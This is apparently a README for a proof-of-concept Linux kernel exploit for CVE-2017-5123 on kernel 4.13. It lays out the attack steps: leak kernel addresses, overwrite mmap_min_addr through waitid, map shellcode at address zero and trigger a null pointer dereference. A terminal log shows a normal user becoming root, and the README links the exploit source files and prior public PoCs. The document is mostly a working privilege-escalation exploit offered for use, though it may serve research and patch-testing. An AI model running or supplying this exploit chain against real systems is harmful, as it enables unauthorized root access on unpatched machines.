为乐趣而编写PoC并教育人们认真对待安全；-)___下载.zip

# Exploit for CVE-2017-5123 ## Step * Complile kernel with null pointer dereference module * Run a VM( qemu) with costum kernel( no smep default) * Found mmap_min_addr/dac_mmap_min_addr address by reading "/proc/kallsyms" or waitid infoleak * Overwrite the mmap_min_addr/dac_mmap_min_addr by calling waitid( CVE-2017-5123), disable mmap_min_addr * Map the shellcode to 0x00 and touch the kernel null point dereference to get privilege * Run a shell with root ## Can & can't Kernel version 4.13 Need:( "/proc/kallsyms" readable | vmlinux) & (kernel null pointer dereference) Bypass:mmap_min_addr, ksalr Not bypass: SMEP Exploit: kernel null pointer dereference Result: get a root shell ## Source files * [disable_map_min_addr.c](disable_map_min_addr.c) for step 3~4 * [null_poiter_exploit.c](null_poiter_exploit.c) for step 5-6 * [test.c](test.c) for step 1 ## Result My exploit success on Debian9/QEMU. NOTE:QEMU without SMEP default, and my exploit can't bypass SMEP.T_T ``` bins@debian:~$ id uid=1000(bins) gid=1000(bins) groups=1000(bins),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner) bins@debian:~$ cat /proc/sys/vm/mmap_min_addr 1024 bins@debian:~$ ./disable_map_min_addr [+] Leak size=144 bytes [+] Leak point: 0x7fff62dbbb00 [+] Leak point: 0x7fff62dbbb08 [+] Leak point: 0x7fff62dbbb10 [+] Leak point: 0x7fff62dbbb18 [+] Leak point: 0x7fff62dbbb20 [+] Leak point: 0x7fff62dbbb28 [+] Leak point: 0x7fff62dbbb30 [+] Leak point: 0x7fff62dbbb38 [+] Leak point: 0x7fff62dbbb40 [+] Find startup_64... [+] Found startup_64 at ffffffffa2a00000 [+] Got kernel base: 0xffffffffa2a00000 [+] Got mmap_min_addr: 0xffffffffa3b01de8 [+] Got dac_mmap_min_addr: 0xffffffffa388e810 [+] Overwriting map_min_addr... [+] Overwriting dac_mmap_min_addr... [+] map_min_addr disabled! bins@debian:~$ cat /proc/sys/vm/mmap_min_addr 0 bins@debian:~$ ./null_poiter_exploit [+] Find prepare_kernel_cred... [+] Found prepare_kernel_cred at ffffffffa2a77300 [+] Find commit_creds... [+] Found commit_creds at ffffffffa2a76f80 Got commit_creds:0xffffffffa2a76f80,prepare_kernel_cred0xffffffffa2a77300 [+] Try to allocat 0x00000000... [+] Allocation success ! [+]Start touch kernel null point [+] Root shell success !! :) # id uid=0(root) gid=0(root) groups=0(root) # ``` ## Other All the source is modified from spender & @XeR_0x2A & @chaign_c & up201407890: [spender bypass kaslr poc](https://grsecurity.net/~spender/exploits/wait_for_kaslr_to_be_effective.c) [up201407890 disable selinux poc](http://seclists.org/oss-sec/2017/q4/134) [@XeR_0x2A & @chaign_c map shellcode to 0x00](https://www.exploit-db.com/exploits/43029/) [vulnerability analysis in chinese](https://github.com/Bins94/Kernel_Anatomy/tree/master/kernel_4.13_waitid_poc)